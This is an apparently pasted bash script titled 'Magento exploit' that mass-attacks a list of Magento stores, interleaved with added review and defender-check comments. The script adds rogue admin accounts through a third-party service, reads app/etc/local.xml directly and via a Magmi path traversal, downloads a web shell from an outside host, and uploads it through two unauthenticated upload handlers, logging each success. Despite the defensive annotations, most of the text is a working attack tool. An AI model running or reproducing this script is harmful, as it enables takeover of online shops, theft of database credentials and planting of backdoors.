
Magento exploit

greyx Apr 30th, 2017 1,050 Never
  1. #!/bin/bash
  2. # bash magento.sh list.txt user password -
  3. #function
  # addadmin DOMAIN USERNAME PASSWORD
  # Passes the target domain and the wanted admin credentials to a third-party
  # web service and prints/logs whatever that service answers.
  #   $1 - target domain, $2 - admin username, $3 - admin password
  # Writes: addadmin.json (raw response), shoplift.txt (appended result log,
  # credentials in clear text).
  # NOTE(review): no request to the store itself is made here; presumably
  # magAPI.php issues it, so the store's access log would show that service's
  # address, not the operator's - confirm against logs.
  # Defender check: unexpected accounts in the Magento admin user list, and
  # outbound traffic to the host named in the curl line below.
  4. addadmin(){
  # Plain-HTTP POST (--data) carrying domain and credentials to the remote API.
  5.     curl --max-time 10 --connect-timeout 10 --silent "http://btc-market.net/bitcoin/magAPI.php" --data "domain=$1&username=$2&password=$3" > addadmin.json
  # Extract two URLs from the JSON reply; `print obj[...]` is Python 2 syntax.
  6.     exploitadd=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['exploit']['AddAdmin']"`
  7.     downloader=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['exploit']['Downloader']"`
  # The word 'price' anywhere in the reply is the only success signal used.
  8.     cat addadmin.json | grep 'price' > /dev/null;price=$?
  9. if [ $price -eq 0 ]
  10.     then
  11.     echo "========================================="
  12.     echo "ADD ADMIN [+]"
  13.     echo "Domain : $1"
  14.     echo "Username : $2"
  15.     echo "Password : $3"
  16.     echo "Login Admin : $exploitadd"
  17.     echo "Login Downloader : $downloader"
  # Same record again, appended to the on-disk log.
  18.     echo "=========================================" >> shoplift.txt
  19.     echo "Domain : $1" >> shoplift.txt
  20.     echo "Username : $2" >> shoplift.txt
  21.     echo "Password : $3" >> shoplift.txt
  22.     echo "Login Admin : $exploitadd" >> shoplift.txt
  23.     echo "Login Downloader : $downloader" >> shoplift.txt
  24.     echo "=========================================" >> shoplift.txt
  # Repeats the outer test, so it is always true at this point.
  25.     if [ $price -eq 0 ]
  26.         then
  # Reads infoAdmin.price from the reply and prints it as a transaction total.
  27.             prices=`cat addadmin.json | python -c "import json,sys;obj=json.load(sys.stdin);print obj['infoAdmin']['price']"`
  28.             echo "Total Transaction : $prices"
  29.     fi
  30. else
  31. echo "========================================="
  32. echo "ADD ADMIN [-]"
  33. echo "Domain : $1"
  34. echo "[STATUS : NOT VULN]"
  35. fi
  36.     echo "========================================="
  37. }
  # lfi SITE PATH INDEX LABEL
  # Fetches SITE/PATH and reports whether the body contains 'frontName'.
  #   $1 - site, $2 - path to request, $3 - accepted but never read,
  #   $4 - label used in the console message
  # Writes: lfi.txt (appended on a hit).
  # Both callers point PATH at Magento's app/etc/local.xml, directly or through
  # a Magmi download script with a ../ traversal; 'frontName' is an element of
  # that file, which also holds the database credentials and encryption key.
  # Defender check: access-log requests for /app/etc/local.xml or for
  # download_file.php with `file=` containing `../`; deny web access to
  # app/etc and remove or restrict Magmi.
  38. lfi(){
  # $2 already starts with '/', so the requested URL contains a double slash.
  39.     curl --max-time 10 --connect-timeout 10 --silent "$1/$2" | grep 'frontName' > /dev/null;lfi=$?
  40.     if [ $lfi -eq 0 ]
  41.         then
  42.             echo "$1 => [$4 FOUND]"
  43.             echo "$1/$2 => [OK]" >> lfi.txt
  44.         else
  45.             echo "$1 => [$4 NOTFOUND]"
  46.     fi
  47. }
  # jsupload SITE
  # Tests whether SITE/js/webforms/upload/index.php accepts an unauthenticated
  # multipart upload, then uploads the local payload under four PHP-handled
  # extensions and checks that each copy is served back.
  #   $1 - site
  # Reads: sj.php, sj.php5, sj.php3, sj.phtml from the working directory.
  # Writes: webformsshell, checkreadywebforms (scratch), shell.txt (appended).
  # Defender check: POSTs to /js/webforms/upload/index.php (every request here
  # sends the same fixed Firefox/47.0 User-Agent), and script files appearing
  # under js/webforms/upload/files/<dir>/; remove or patch the upload handler
  # and disable script execution in upload directories.
  48. jsupload(){
  # Probe upload: a reply containing 'size":' is taken to mean it was accepted.
  49. curl --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "files[]=@sj.php" --request POST "$1/js/webforms/upload/index.php" | grep 'size":' > /dev/null;webforms=$?
  50. if [ $webforms -eq 0 ];then
  51. echo "[STATUS : VULN]"
  52. echo "Created BackDoor(SHELL):"
  53. for a in sj.php sj.php5 sj.php3 sj.phtml
  54. do
  55. curl --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "files[]=@$a" --request POST "$1/js/webforms/upload/index.php" > webformsshell
  # Fifth ':'-separated field of the reply, second '"'-delimited piece; used
  # below as the per-upload directory name under upload/files/.
  56. ran=$(cat webformsshell | cut -d ':' -f 5 | cut -d '"' -f 2)
  # No timeout on this fetch, unlike the upload requests.
  57. curl -s "$1/js/webforms/upload/files/${ran}/$a" > checkreadywebforms
  # 'incovers' is presumably a string the payload prints when it executes -
  # the payload itself is not on this page.
  58. cat checkreadywebforms | grep 'incovers' > /dev/null;checkreadywebforms=$?
  59. if [ $checkreadywebforms -eq 0 ];then
  60. echo "- $1/js/webforms/upload/files/${ran}/$a SUCCESS"
  61. echo "- $1/js/webforms/upload/files/${ran}/$a SUCCESS" >> shell.txt
  62. else
  63. echo "- $1/js/webforms/upload/files/${ran}/$a FAILED"
  64. fi
  65. done
  66. else
  67. echo "[STATUS : NOT VULN]"
  68. fi
  69. }
  # tinyupload SITE
  # Tests whether SITE/js/rokmage_tinymce/tinyupload.php is reachable, then
  # uploads the local payload under four PHP-handled extensions and checks
  # that each copy is served from /media/rt-tinymce-uploads/.
  #   $1 - site
  # Reads: sj.php, sj.php5, sj.php3, sj.phtml from the working directory.
  # Writes: mbuts, tinybackdoor (scratch), shell.txt (appended).
  # Defender check: requests to /js/rokmage_tinymce/tinyupload.php and script
  # files under media/rt-tinymce-uploads/; remove the uploader and disable
  # script execution under media/.
  70. tinyupload(){
  # A GET whose body contains the form field name 'tuUploadFile' counts as a hit.
  71. curl -s "$1/js/rokmage_tinymce/tinyupload.php" | grep 'tuUploadFile' > /dev/null;rokmage=$?
  72. if [ $rokmage -eq 0 ];then
  73. echo "[STATUS : VULN]"
  74. echo "Created BackDoor(SHELL):"
  75. for a in sj.php sj.php5 sj.php3 sj.phtml
  76. do
  # Upload keeps the original file name; the reply is saved but not inspected.
  77. curl -s --max-time 10 --connect-timeout 10 --silent -A "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" -F "tuUploadFile[]=@$a" --request POST "$1/js/rokmage_tinymce/tinyupload.php" > mbuts
  78. curl -s "$1/media/rt-tinymce-uploads/$a" > tinybackdoor
  # Skip this variant when the fetch output file does not exist.
  79. if [ ! -f tinybackdoor ];then
  80. continue
  81. fi
  # 'incovers' is presumably a string the payload prints when it executes -
  # the payload itself is not on this page.
  82. cat tinybackdoor | grep 'incovers' > /dev/null;tinybackdoor=$?
  83. if [ $tinybackdoor -eq 0 ];then
  84. echo "- $1/media/rt-tinymce-uploads/$a SUCCESS"
  85. echo "- $1/media/rt-tinymce-uploads/$a SUCCESS" >> shell.txt
  86. else
  87. echo "- $1/media/rt-tinymce-uploads/$a FAILED"
  88. fi
  89. done
  90. else
  91. echo "[STATUS : NOT VULN]"
  92. fi
  93. }
  # backdoor
  # Downloads the payload from a remote host into sj.php and copies it to the
  # three other extensions used by jsupload and tinyupload.
  # Writes: sj.php, sj.php5, sj.php3, sj.phtml in the working directory.
  # NOTE(review): the hosting domain and the /sj.txt path are indicators taken
  # from this paste; whether that host is itself a compromised site cannot be
  # told from here. The curl exit status is not checked, so an empty or error
  # response is saved as the payload.
  94. backdoor(){
  95. curl -s "jennessfarm.com/sj.txt" > sj.php
  96. for a in sj.php5 sj.php3 sj.phtml
  97. do
  98. cp sj.php $a
  99. done
  100. }
  101. #layout
  # Driver. Arguments (per the usage comment at the top of the paste):
  #   $1 - file listing target sites, $2 - admin username, $3 - admin password
  # Fetches the payload once if sj.php is not already present, then runs every
  # check against every site in order. There is no rate limiting, so one run
  # leaves a burst of requests to the same fixed set of paths on each site -
  # a sequence a defender can match in access logs.
  102. if [ ! -f sj.php ];then
  103. backdoor
  104. fi
  # Unquoted `cat $1`: the list is split on any whitespace, one site per word.
  105. for sites in `cat $1`
  106. do
  107. addadmin "$sites" $2 $3
  108. echo "LFI AND LFD [+]"
  # Direct read of local.xml, then the same file through Magmi's downloader.
  109. lfi "$sites" "/app/etc/local.xml" "1" "default"
  110. lfi "$sites" "/magmi/web/download_file.php?file=../../app/etc/local.xml" "2" "Magmi"
  111. echo "========================================="
  112. echo "JS Webform (Upload Vulnerbility)"
  113. jsupload "$sites"
  114. echo "========================================="
  115. echo "TinyExploit (Upload Vulnerbility)"
  116. tinyupload "$sites"
  117. echo "========================================="
  118. done